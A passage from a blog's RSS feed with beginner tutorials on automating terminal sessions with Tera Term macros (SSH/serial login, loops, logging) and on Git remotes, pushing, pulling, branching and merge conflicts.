It allows you to...]]></description><link>https://chinhnd.org/automate-your-terminal-with-tera-term-macro</link><guid isPermaLink="true">https://chinhnd.org/automate-your-terminal-with-tera-term-macro</guid><category><![CDATA[automation]]></category><category><![CDATA[networking]]></category><category><![CDATA[teraterm]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 31 Aug 2023 04:46:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/p1m4B-lhS9Y/upload/5290ab9103a7552978515b48a0081d4c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-tera-term-and-teraterm-macro">What are Tera Term and Teraterm Macro?</h1>
<p>Tera Term is a terminal emulator software that is free and open-source. It supports Serial, TCP/IP, and named pipe connections. Tera Term Macro is a scripting language that comes with Tera Term.</p>
<p>It allows you to automate various tasks that you can do with a terminal, such as auto-login, auto-logging, auto-configuration, monitoring, and more.</p>
<p>Tera Term language (TTL) is the language used for writing macros. You can find the documentation at <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/macro/">MACRO Help Index</a>. You can use any text editor to create your macros.</p>
<p>In this article, I will show you how to use TTL to automate anything that needs a terminal input.</p>
<h1 id="heading-connect-to-a-remote-host">Connect to a Remote host</h1>
<p>To begin working with TTL, you have to connect to a remote host first.</p>
<p>To connect to a serial port, you can:</p>
<pre><code class="lang-markdown">;Set the COM5 port
connect '/C=5'
</code></pre>
<p>Here is an example of how to SSH to a host using the password method:</p>
<pre><code class="lang-markdown">connect 'myserver /ssh /auth=password /user=username /passwd=password'
</code></pre>
<p>This code snippet connects to a remote host using SSH connection (port 22). You can replace <code>myserver</code> with the IP address or hostname of the remote host.</p>
<ul>
<li><p>The <code>/auth=password</code> parameter is used to indicate using the password method.</p>
</li>
<li><p>The <code>/user=username</code> parameter is used to specify the username.</p>
</li>
<li><p>The <code>/passwd=password</code> parameter is used to specify the password.</p>
</li>
</ul>
<p>Here is an example of how to connect to SSH using public key method:</p>
<pre><code class="lang-markdown">connect 'myserver /ssh /auth=publickey /user=username /keyfile=private-key-file'
</code></pre>
<p>The <code>/auth=publickey</code> parameter is used to indicate that we are using public key authentication.</p>
<ul>
<li><p>The <code>/user=username</code> parameter is used to specify the username.</p>
</li>
<li><p>The <code>/keyfile=private-key-file</code> parameter is used to specify the private key file.</p>
</li>
</ul>
<p>You can find more information about other options for connecting to SSH using Tera Term macro in the <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/usage/ssh.html">Tera Term documentation</a>.</p>
<p>After connecting to the remote host, you can then execute your automation script.</p>
<h1 id="heading-variables">Variables</h1>
<p>There are two types of variables:</p>
<ul>
<li><p>Strings (limited to 255 characters)</p>
</li>
<li><p>Integers (limited to ~ +/-2 billion)</p>
</li>
</ul>
<p>To create a variable in TTL, simply assign a value with the <code>=</code> operator:</p>
<pre><code class="lang-haskell">&lt;variable_name&gt; = &lt;value&gt;
</code></pre>
<p>For example, to create a variable named <code>my_var</code> and assign it the value 123, you can use the following command:</p>
<pre><code class="lang-haskell">my_var = 123
</code></pre>
<p>You can then pass the variable to commands by name. For example, to display the value of <code>my_var</code> in a dialog, convert it to a string with <code>int2str</code> and show it with <code>messagebox</code> (which takes a message and a title):</p>
<pre><code class="lang-haskell">int2str msg my_var
messagebox msg 'My macro'
</code></pre>
<p>This will display a message box with the value of <code>my_var</code> (which is 123 in this case).</p>
<h1 id="heading-user-input"><strong>User input</strong></h1>
<p>To get user input in Tera Term Macro, you can use the <code>inputbox</code> command, which stores the typed text in the system variable <code>inputstr</code>. Here is an example:</p>
<pre><code class="lang-haskell">inputbox 'Enter your name:' 'Input'
sprintf2 msg 'Hello, %s!' inputstr
messagebox msg 'Greeting'
</code></pre>
<p>This code snippet prompts the user to enter their name, formats the text "Hello, " followed by the value of <code>inputstr</code> and an exclamation mark, and displays it in a message box.</p>
<h1 id="heading-special-statements">Special Statements</h1>
<p>Tera Term Macro has many special statements that you can use to control Tera Term and automate your tasks.</p>
<p>Some of the special statements include <code>wait</code>, <code>sendln</code>, <code>connect</code>, <code>input</code>, <code>print</code>, <code>if</code>, <code>goto</code>, <code>label</code>, and more. You can find more information about these special statements in the <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/">Tera Term documentation</a>.</p>
<p>I will introduce you to some of the most commonly used special statements and how to use them.</p>
<h2 id="heading-wait-and-sendln">wait and sendln</h2>
<p>Some of the most useful features of Tera Term Macro are <code>wait</code> and <code>send</code>/<code>sendln</code>.</p>
<p>The <code>wait</code> statement reads the terminal output and, when one of the given strings is found, sets the system variable <code>result</code> to the index of that string and moves on.</p>
<p>This can be useful to wait for a password prompt or wait for the result of the command.</p>
<p>A nice addition to the <code>wait</code> command is the <code>sendln</code> and <code>send</code> commands. These do what their names suggest: they write out commands to the terminal (with <code>sendln</code> adding a new line at the end).</p>
<p>For example, I can log in to my network device and then execute some commands without entering my password.</p>
<pre><code class="lang-haskell">;<span class="hljs-type">Set</span> the <span class="hljs-type">COM5</span> port
<span class="hljs-title">connect</span> '/<span class="hljs-type">C</span>=<span class="hljs-number">5</span>'

;<span class="hljs-type">Set</span> the username and password's prompt and value
<span class="hljs-type">UsernamePrompt</span> = 'login:'
<span class="hljs-type">PasswordPrompt</span> = '<span class="hljs-type">Password</span>:'

;<span class="hljs-type">Set</span> credentials value
<span class="hljs-type">Username</span> ='admin'
<span class="hljs-type">Password</span> = 'mypassword'

;<span class="hljs-type">Set</span> the command to execute after
<span class="hljs-type">Command</span> = 'show interface description'

;<span class="hljs-type">Wait</span> for the <span class="hljs-type">UsernamePrompt</span>
<span class="hljs-title">wait</span> <span class="hljs-type">UsernamePrompt</span>
;input <span class="hljs-type">Username</span> here <span class="hljs-keyword">if</span> <span class="hljs-type">UsernamePrompt</span> is received
<span class="hljs-title">sendln</span> <span class="hljs-type">Username</span>

;<span class="hljs-type">Wait</span> for the <span class="hljs-type">PasswordPrompt</span>
<span class="hljs-title">wait</span> <span class="hljs-type">PasswordPrompt</span>
;input <span class="hljs-type">Password</span> here <span class="hljs-keyword">if</span> <span class="hljs-type">PasswordPrompt</span> is received
<span class="hljs-title">sendln</span> <span class="hljs-type">Password</span>

;Wait for the prompt (assumed to be '&gt;' here), then run the command
<span class="hljs-title">wait</span> '&gt;'
<span class="hljs-title">sendln</span> <span class="hljs-type">Command</span>
</code></pre>
<p>This script waits for each expected string and, when it appears, sends the corresponding response. The <code>sendln</code> command sends characters followed by a new-line character to the host.</p>
<p>With these two statements, you can send in a command, wait for the result, then execute another command. You can do pretty much anything that usually requires manual input from the terminal.</p>
<h2 id="heading-strconcat-and-sprintf2">strconcat and sprintf2</h2>
<p><code>strconcat</code> is a command in Tera Term macro that appends a copy of a string to the end of a string variable. For example:</p>
<pre><code class="lang-haskell"><span class="hljs-title">filename</span> = <span class="hljs-string">"C:\\teraterm\\"</span>
<span class="hljs-title">strconcat</span> filename 'test.txt'
</code></pre>
<p>Starting with <code>filename</code> set to <code>C:\\teraterm\\</code>, you can append <code>test.txt</code> to it using the <code>strconcat</code> command. The resulting value of <code>filename</code> is <code>C:\\teraterm\\test.txt</code>.</p>
<p><code>sprintf2</code> is another command in Tera Term macro that returns formatted output. It works similarly to the <code>sprintf</code> command but with more options. The output string is stored in the string variable. For example:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sprintf2</span> var <span class="hljs-string">"%s/ USER NAME:%s"</span> '192.168.1.1' 'test user'
</code></pre>
<p>The above command formats <code>var</code> as <code>192.168.1.1/ USER NAME:test user</code> by replacing each <code>%s</code> with the strings that follow. This works much like format strings in languages such as C or PowerShell.</p>
<h2 id="heading-conditional-statements">Conditional statements</h2>
<p>TTL supports conditional statements such as <code>if</code>, <code>then</code>, <code>elseif</code>, <code>else</code>, <code>endif</code>.</p>
<p>Here is how you can create a <code>if/else</code> statement in TTL:</p>
<pre><code class="lang-haskell">if &lt;expression&gt; then
  &lt;statement&gt;
elseif &lt;expression&gt; then
  &lt;statement&gt;
else
  &lt;statement&gt;
endif
</code></pre>
<p>If the condition is true, the commands following <code>if</code> are executed. Otherwise, the commands following <code>else</code> are executed.</p>
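<p>For instance, here is a sketch that branches on which prompt the host sends; the prompt strings, responses, and 10-second timeout are assumptions for illustration:</p>
<pre><code class="lang-haskell">timeout = 10
wait 'login:' 'Password:'
if result = 1 then
   sendln 'admin'
elseif result = 2 then
   sendln 'mypassword'
else
   messagebox 'Timed out waiting for a prompt' 'Error'
endif
</code></pre>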
<h2 id="heading-loop-statements">Loop statements</h2>
<p>To use loop statements in Tera Term Macro, you can use the <code>do</code>, <code>while</code>, <code>until</code>, <code>for</code>, and <code>next</code> commands</p>
<h3 id="heading-while">while</h3>
<p>Here is how you can create a <code>while</code> statement in TTL:</p>
<pre><code class="lang-haskell"><span class="hljs-title">while</span> &lt;condition&gt;
    &lt;command&gt;
<span class="hljs-title">endwhile</span>
</code></pre>
<p>The commands following the <code>while</code> keyword are executed repeatedly as long as the condition is true.</p>
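<p>As a concrete sketch, the following loop sends a command five times; the command and the '&gt;' prompt are assumptions for illustration:</p>
<pre><code class="lang-haskell">i = 1
while i &lt;= 5
    sendln 'show clock'
    wait '&gt;'
    i = i + 1
endwhile
</code></pre>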
<h3 id="heading-goto">goto</h3>
<p>To use <code>goto</code> in Tera Term Macro, you need to define a label by writing its name prefixed with a colon, such as <code>:start</code>.</p>
<p>Here is an example of how to use <code>goto</code> in Tera Term Macro:</p>
<pre><code class="lang-haskell">:start
inputbox 'Enter your age:' 'Input'
Age = inputstr
if Age = '' goto start
</code></pre>
<p>This code snippet defines a label called <code>start</code>. It prompts the user to enter their age and stores the input in the variable <code>Age</code>.</p>
<p>If the value of Age is empty, it will jump back to the label start.</p>
<h3 id="heading-for-and-next">for and next</h3>
<p>They repeat the commands between <code>for</code> and <code>next</code>, counting the integer variable from the first value up to the last value given in the <code>for</code> statement. After each pass, the integer variable increases by 1.</p>
<p>Here is an example:</p>
<pre><code class="lang-haskell">for i 1 10
  send 'Hello World'
next
</code></pre>
<h3 id="heading-do-and-loop">do and loop</h3>
<p>One of the more difficult statements to understand is <code>do</code> and <code>loop</code> . They repeat the commands between them according to the conditions as follows:</p>
<ul>
<li><p>If <code>while &lt;condition&gt;</code> is specified, the loop repeats while the condition is non-zero.</p>
</li>
<li><p>If <code>until &lt;condition&gt;</code> is specified, the loop repeats while the condition is zero.</p>
</li>
</ul>
<p>Here is an example:</p>
<pre><code class="lang-haskell">; Send clipboard content to the terminal in chunks
offset = 0
do
   clipb2var buff offset
   if result &gt; 0 send buff
   offset = offset + 1
loop while result = 2
</code></pre>
<h1 id="heading-save-the-log">Save the log</h1>
<p>The <code>logopen</code> statement causes Tera Term to start logging, and the <code>logclose</code> statement tells it to stop. Everything in your terminal will be saved to the location you specify.</p>
<p>Here is an example of a macro that logs data received from the host:</p>
<pre><code class="lang-haskell">;<span class="hljs-type">Start</span> logging
<span class="hljs-title">logopen</span> <span class="hljs-string">"C:\log.txt"</span> <span class="hljs-number">0</span> <span class="hljs-number">1</span>

;<span class="hljs-type">Wait</span> for <span class="hljs-class"><span class="hljs-keyword">data</span> from the host</span>
<span class="hljs-title">wait</span> <span class="hljs-string">"&gt;"</span>
<span class="hljs-title">sendln</span> <span class="hljs-string">"show version"</span>

;<span class="hljs-type">Wait</span> for the command output

<span class="hljs-title">wait</span> <span class="hljs-string">"show version"</span>
<span class="hljs-title">wait</span> <span class="hljs-string">"&gt;"</span>

; <span class="hljs-type">Stop</span> logging
<span class="hljs-title">logclose</span>
</code></pre>
<p>This macro logs the output of the “show version” command to a file named “log.txt” in the root directory of drive C. The logopen command starts logging and the logclose command stops logging.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>As a network engineer myself, working with a command-line interface often requires executing the same set of commands many times.</p>
<p>The same is true for many other technical roles, such as developers and testers.</p>
<p>Being able to send a set of commands to a terminal automatically is a great time-saver.</p>
<p>In this article, I introduced you to Tera Term Macro, a powerful language that can accelerate your workflow immensely.</p>
]]></content:encoded></item><item><title><![CDATA[Working with a Remote GitHub repository]]></title><description><![CDATA[Why do we use Remote repositories?
Remote repositories allow you to:

Back up your project.

Access a Git project from multiple computers.

Collaborate with others on different projects.


Working with a Remote repository
There are three steps to thi...]]></description><link>https://chinhnd.org/working-with-a-remote-github-repository</link><guid isPermaLink="true">https://chinhnd.org/working-with-a-remote-github-repository</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Tue, 22 Aug 2023 07:47:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/wnShDP37vB4/upload/9acec8ff798bb8ca14a2c3d3f5eba371.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-why-do-we-use-remote-repositories">Why do we use Remote repositories?</h1>
<p>Remote repositories allow you to:</p>
<ul>
<li><p>Back up your project.</p>
</li>
<li><p>Access a Git project from multiple computers.</p>
</li>
<li><p>Collaborate with others on different projects.</p>
</li>
</ul>
<h1 id="heading-working-with-a-remote-repository">Working with a Remote repository</h1>
<p>There are three steps to this process:</p>
<ul>
<li><p>Create the remote repository on GitHub.</p>
</li>
<li><p>Add a connection to the remote repository in the local repository.</p>
</li>
<li><p>Upload (or push) data from the local repository to the remote repository.</p>
</li>
</ul>
<h2 id="heading-create-a-remote-repository">Create a Remote repository</h2>
<p>Go to https://github.com and create an account. Then you can create a new repository.</p>
<p>On the Create a new repository page, you need to provide some information:</p>
<ul>
<li><p>Repository name</p>
</li>
<li><p>Description</p>
</li>
<li><p>Accessibility (Public or Private)</p>
</li>
</ul>
<p>and click on the Create repository button shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692587324991/e00a3b02-7fcf-4efb-a16d-1702f58e5fec.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-git-clone">Git clone</h2>
<p>Git allows you to copy a GitHub repository onto your local machine, giving you your own local repository. To perform this task, Git provides the <code>git clone</code> command.</p>
<p>You can get the URL by going to your Quick Setup page.</p>
<p>Or if you have an established repo, you can find it in the Code section.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692588190358/30c01ba8-e8be-4857-9532-9d902a34d20f.png" alt class="image--center mx-auto" /></p>
<p>On your local machine, open the command prompt, navigate to the folder where you would like your local repository to live, and type the following command:</p>
<pre><code class="lang-bash">$ git <span class="hljs-built_in">clone</span> https://github.com/&lt;your-username&gt;/&lt;your-repo&gt;
</code></pre>
<p>You will have a copy of the remote repository on your local machine.</p>
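<p>Note that <code>git clone</code> automatically adds a connection to the remote repository, named <code>origin</code>. If you instead started from a local repository created with <code>git init</code>, you can add that connection manually; the URL below is a placeholder for your own repository's URL:</p>

```shell
# Run inside a repository created with `git init`.
# The URL is a placeholder; substitute your repository's URL.
git remote add origin https://github.com/example-user/example-repo.git
git remote -v   # lists origin with its fetch and push URLs
```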
<h2 id="heading-git-push">Git Push</h2>
<p>Now let’s create a simple <code>index.html</code> file and save it in our working directory.</p>
<p>Then use <code>git add</code> command to add the file from the working directory to the staging area. Use <code>git commit</code> command to save the changes from the staging area into our local repository. You can read about <code>git add</code> and <code>git commit</code> <a target="_blank" href="https://blog.nguyenducchinh.com/github-making-your-first-commit">here</a>.</p>
<pre><code class="lang-bash">$ git status
On branch main

No commits yet

Changes to be committed:
  (use <span class="hljs-string">"git rm --cached &lt;file&gt;..."</span> to unstage)
        new file:   index.html

$ git commit -m <span class="hljs-string">"remote repo"</span>
[main (root-commit) efc93b3] remote repo
 1 file changed, 19 insertions(+)
 create mode 100644 index.html
</code></pre>
<p>Now, you can use <code>git push</code> to push your commits to the remote repository.</p>
<pre><code class="lang-bash">$ git push
info: please complete authentication <span class="hljs-keyword">in</span> your browser...
Enumerating objects: 3, <span class="hljs-keyword">done</span>.
Counting objects: 100% (3/3), <span class="hljs-keyword">done</span>.
Delta compression using up to 8 threads
Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
Writing objects: 100% (3/3), 447 bytes | 447.00 KiB/s, <span class="hljs-keyword">done</span>.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
To https://github.com/susuomlu/git-begin.git
 * [new branch]      main -&gt; main
</code></pre>
<p>Now check your GitHub repository again; you can see the newly uploaded file.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692686887062/7b20ae03-58e6-4159-85b3-52d7ae79183a.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-git-pull">Git Pull</h2>
<p>Let’s update the <code>index.html</code> file present in the GitHub repository.</p>
<p>Open GitHub repository page, open <code>index.html</code> and click edit as shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692687345172/5e86a4c7-93d0-47b4-9494-dd20af0f3000.png" alt class="image--center mx-auto" /></p>
<p>Choose Commit changes and write the commit message, as shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692687705789/6ff98099-3e31-4b3c-b9a4-7cc972a4cc99.png" alt class="image--center mx-auto" /></p>
<p>Now the GitHub repository contains the latest updated version of <code>index.html</code> file. However, the local repository is now outdated.</p>
<p>In order to get this new version into our local repository, the <code>git pull</code> command is used.</p>
<pre><code class="lang-bash">$ git pull
remote: Enumerating objects: 5, <span class="hljs-keyword">done</span>.
remote: Counting objects: 100% (5/5), <span class="hljs-keyword">done</span>.
remote: Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
remote: Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), 677 bytes | 35.00 KiB/s, <span class="hljs-keyword">done</span>.
From https://github.com/susuomlu/git-begin
   efc93b3..1b054c7  main       -&gt; origin/main
Updating efc93b3..1b054c7
Fast-forward
 index.html | 1 +
 1 file changed, 1 insertions(+)
</code></pre>
<p>Open the <code>index.html</code> file on your local machine again and you will see the updated version.</p>
<h2 id="heading-git-merge-and-merge-conflict">Git Merge and Merge Conflict</h2>
<p>A merge conflict happens when developers work on the same file and on the same lines of code.</p>
<p>When this happens, Git does not know how to resolve the changes automatically; it throws a merge conflict message, and it is up to the developer to resolve the situation.</p>
<p>In your local machine, open <code>index.html</code> and make changes to it.</p>
<p>After it do <code>git add</code> and <code>git commit</code> do save the changes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692688180060/f2a24fc6-0661-4e44-86da-0967fc4aac1c.png" alt class="image--center mx-auto" /></p>
<p>Open the GitHub repository page, update <code>index.html</code> file at the same line and commit the changes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692688351181/9dbad7ee-6732-4660-8034-5615dc50f9a4.png" alt class="image--center mx-auto" /></p>
<p>Now let's pull the code from GitHub. Since changes were made to the same file and to the same line, Git throws a merge conflict message as shown below.</p>
<pre><code class="lang-bash">$ git pull
remote: Enumerating objects: 5, <span class="hljs-keyword">done</span>.
remote: Counting objects: 100% (5/5), <span class="hljs-keyword">done</span>.
remote: Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
remote: Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), 682 bytes | 22.00 KiB/s, <span class="hljs-keyword">done</span>.
From https://github.com/susuomlu/git-begin
   1b054c7..14e1e2c  main       -&gt; origin/main
Auto-merging index.html
CONFLICT (content): Merge conflict <span class="hljs-keyword">in</span> index.html
Automatic merge failed; fix conflicts and <span class="hljs-keyword">then</span> commit the result.
</code></pre>
<p>Let’s open the <code>index.html</code> file on our local machine. You can see that Git has inserted conflict markers in it.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692689794039/bcd3a017-24fe-4957-bd5d-851187ec2ac5.png" alt class="image--center mx-auto" /></p>
<p>In order to resolve this issue, one of the developers has to remove the conflict markers from the <code>index.html</code> file, keep the desired content, and commit it again.</p>
<p>In this case, I decided to delete my own modification and keep the version from the GitHub repository.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692689722120/ed105d62-c959-4ef5-bce7-210b4a322e9f.png" alt class="image--center mx-auto" /></p>
<p><em>Note: The shortcut for</em> <code>git add</code> + <code>git commit</code> <em>(for files Git already tracks) is:</em> <code>git commit -am "commit message"</code></p>
<pre><code class="lang-bash">$ git commit -am <span class="hljs-string">"merge resolve"</span>
[main 8efe397] merge resolve
$ git pull
Already up to date.
</code></pre>
<p>This is the final post in my series on the basics of working with Git and GitHub.</p>
<p>We went through how to work with a local repository, how to branch and merge, and finally how to work with a remote repository.</p>
<p>For older posts regarding this topic you can refer to:</p>
<p><a target="_blank" href="https://blog.nguyenducchinh.com/github-making-your-first-commit">[GitHub] Making your first commit</a></p>
<p><a target="_blank" href="https://blog.nguyenducchinh.com/github-branching-and-merging">[GitHub] Branching and Merging</a></p>
]]></content:encoded></item><item><title><![CDATA[GitHub Branching and Merging]]></title><description><![CDATA[What are Git Branches?
Suppose I'm writing an online novel. The published chapters are the main branch.
I don’t want to publish to the official line until my editor has reviewed and approved it.
So, I can make a secondary branch, work on that branch,...]]></description><link>https://chinhnd.org/github-branching-and-merging</link><guid isPermaLink="true">https://chinhnd.org/github-branching-and-merging</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 14 Aug 2023 08:09:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/jH_-L1C_o6Q/upload/b2f62b75fd21f8976a6656562b29cf8f.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-git-branches">What are Git Branches?</h1>
<p>Suppose I'm writing an online novel. The published chapters are the main branch.</p>
<p>I don’t want to publish to the official line until my editor has reviewed and approved it.</p>
<p>So, I can make a secondary branch, work on that branch, and then submit it to be reviewed by my editor. Once they’ve approved the work I can combine that branch into the main branch.</p>
<p>If I hire an assistant, we can work on our own secondary branches. Then, only the work on a secondary branch that has been approved by both the other author and the editor will be combined with the main branch.</p>
<p>A branch represents a line of development. Branches in Git are movable pointers to commits.</p>
<p>New commits are recorded in the history of the current branch. Every time you commit, the current branch's pointer moves forward automatically.</p>
<p>A Git project can have multiple branches (or lines of development). Each of these branches is a standalone version of the project.</p>
<h1 id="heading-why-do-we-use-branches">Why do we use Branches?</h1>
<p>Branches are a powerful tool for managing your code in Git. They allow you to work on different aspects of your project without interfering with each other and allow multiple people to work on the same project at the same time.</p>
<p>You can also use branches to create pull requests on platforms like GitHub or GitLab, where other developers can review and approve your code before merging it to the main branch.</p>
<h1 id="heading-working-on-a-branch">Working on a Branch</h1>
<p>Let's go back to the project from the previous post. I modified the <code>colors.txt</code> file:</p>
<pre><code class="lang-bash">❯ git status
On branch main
Changes not staged <span class="hljs-keyword">for</span> commit:
  (use <span class="hljs-string">"git add &lt;file&gt;..."</span> to update what will be committed)
  (use <span class="hljs-string">"git restore &lt;file&gt;..."</span> to discard changes <span class="hljs-keyword">in</span> working directory)
        modified:   colors.txt

no changes added to commit (use <span class="hljs-string">"git add"</span> and/or <span class="hljs-string">"git commit -a"</span>)
</code></pre>
<p>Git tells us that <code>colors.txt</code> is a modified file, and it is now listed in the <code>git status</code> output. However, the file is not staged for commit; in other words, it has not been added to the staging area.</p>
<p>Let's stage it and commit it.</p>
<pre><code class="lang-bash">❯ git add -A

❯ git commit -m <span class="hljs-string">"begin"</span>
[main 2314fbc] begin
 1 file changed, 1 insertion(+)

❯ git <span class="hljs-built_in">log</span>
commit 2314fbc16b12a978e455eb852c400425e389aa8a (HEAD -&gt; main)
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;
Date:   Mon Aug 14 13:14:54 2023 +0700
  begin

commit acdeedbd9540d6a4918d81e7926096a380839dd2
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;
Date:   Sat Aug 12 15:00:47 2023 +0700
  first commit
</code></pre>
<p>You just made a new commit on a branch; in this case, the main branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691994875943/0795a128-eb96-477b-9677-894b351a0dd4.png" alt class="image--center mx-auto" /></p>
<p>HEAD indicates which branch you are on via a reference stored under <code>.git/refs/heads</code>. You can also see which branch you are on using <code>git branch</code>.</p>
<pre><code class="lang-bash">❯ git branch
* main
</code></pre>
<p>The * symbol indicates which branch you are on.</p>
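<p>You can also inspect the HEAD reference directly by reading the <code>.git/HEAD</code> file. A quick check in a throwaway repository:</p>

```shell
cd "$(mktemp -d)"   # throwaway directory for the demo
git init -q
cat .git/HEAD       # e.g. "ref: refs/heads/main" (or "master", depending on your Git configuration)
```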
<h1 id="heading-create-a-branch">Create a Branch</h1>
<p>You can use the command <code>git branch &lt;name&gt;</code> to create a new branch with the given name. This will not switch you to the new branch but only create it.</p>
<pre><code class="lang-bash">❯ git branch chapter<span class="hljs-comment">#1</span>

❯ git branch
  chapter<span class="hljs-comment">#1</span>
* main
</code></pre>
<p>To switch to the new branch, you can use <code>git checkout &lt;name&gt;</code> or <code>git switch &lt;name&gt;</code>.</p>
<pre><code class="lang-bash">❯ git checkout chapter<span class="hljs-comment">#1</span>
Switched to branch <span class="hljs-string">'chapter#1'</span>

❯ git branch
* chapter<span class="hljs-comment">#1</span>
  main
</code></pre>
<p>If I edit <code>colors.txt</code> again and commit it with <code>git commit -m "new branch"</code>, the branch is now separated.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691998741539/ae61ee87-bd5d-4f51-978c-c6ad36174455.png" alt class="image--center mx-auto" /></p>
<p>Now the HEAD is in another branch called chapter#1.</p>
<h1 id="heading-what-is-git-merge">What is Git Merge?</h1>
<p>Merge is a way of combining the changes from two different branches in Git. When you merge, you take the latest commits from one branch and apply them to another branch. This way, you can keep your code up to date and avoid conflicts. Merging is usually done when you want to integrate new features or bug fixes into your main branch.</p>
<p>You can merge using the <code>git merge</code> command, or use a graphical tool like GitHub Desktop or GitKraken.</p>
<p>There are two types of merges:</p>
<ul>
<li><p>Fast-forward merges</p>
</li>
<li><p>Three-way merges</p>
</li>
</ul>
<h2 id="heading-fast-forward-merge">Fast-forward Merge</h2>
<p>Let’s assume I work on my book <code>colors.txt</code> and I add commits C and D to the chapter#1 branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999218289/24643b8b-3e7c-4059-9e38-6fb82694ca55.png" alt class="image--center mx-auto" /></p>
<p>When I switch back to main and merge with the <code>git merge</code> command, a fast-forward merge occurs.</p>
<p>In this case, we can say the branches have not diverged. During the fast-forward merge, the main branch pointer simply moves forward to point to the commit that the chapter#1 branch points to, which is D.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999443587/ab6c4699-3135-403b-8c7e-545e9584c287.png" alt class="image--center mx-auto" /></p>
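<p>You can reproduce a fast-forward merge end-to-end in a throwaway repository. The file and branch names below follow the example above; the commit contents are illustrative, and <code>git init -b</code> requires Git 2.28 or later:</p>

```shell
cd "$(mktemp -d)"                       # throwaway repository for the demo
git init -q -b main
git config user.email demo@example.com  # local identity for the demo commits
git config user.name demo
echo "chapter 1" > colors.txt
git add colors.txt && git commit -qm "A"
git checkout -qb "chapter#1"            # create and switch to the feature branch
echo "chapter 1, revised" >> colors.txt
git commit -qam "C"
git checkout -q main
git merge "chapter#1"                   # reports "Fast-forward": main simply moves up
```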
<h2 id="heading-three-way-merge">Three-way Merge</h2>
<p>Now suppose I decide to make a chapter#8 branch to work on chapter 8 of my book <code>colors.txt</code>, and I make commits E and F.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999953213/4e1bb581-6ad1-41e6-b8ec-196cacfceae1.png" alt class="image--center mx-auto" /></p>
<p>If I merge the chapter#8 branch into the main branch, it can’t be a fast-forward merge because there is no way to simply move the branch pointer forward to combine these two development histories.</p>
<p>Instead, a merge commit will be created to tie the two development histories together. This is a three-way merge.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692000213086/dfd64bff-1745-4798-ac92-cb82577a2631.png" alt class="image--center mx-auto" /></p>
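<p>The same scenario can be sketched in a throwaway repository (the repository name <code>book</code> and the identity are examples; <code>--no-edit</code> keeps Git's default merge message):</p>

```shell
set -e
cd "$(mktemp -d)"
git init -q -b main book && cd book
git config user.email you@example.com && git config user.name "You"
git commit -q --allow-empty -m "B"      # common ancestor on main
git switch -q -c "chapter#8"
git commit -q --allow-empty -m "E"      # commits E and F on chapter#8
git commit -q --allow-empty -m "F"
git switch -q main
git commit -q --allow-empty -m "D"      # main has moved too, so the histories diverged
git merge --no-edit "chapter#8"         # creates a merge commit tying both histories
git cat-file -p HEAD | grep '^parent'   # two parent lines, one per merged history
```

<p>The merge commit has two parents, which is exactly what ties the two development histories together.</p>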
<p>In this topic, I introduced the concept of branches as different lines of development and showed that they are movable pointers to different commits.</p>
<p>We also learned what merging is, met the two types of merges, and saw how the type of merge carried out depends on the development histories of the branches involved.</p>
<p>In the next topic, we will learn about Pushing and Pulling from a Remote Repository.</p>
]]></content:encoded></item><item><title><![CDATA[Making your first GitHub commit]]></title><description><![CDATA[What are Git and GitHub?
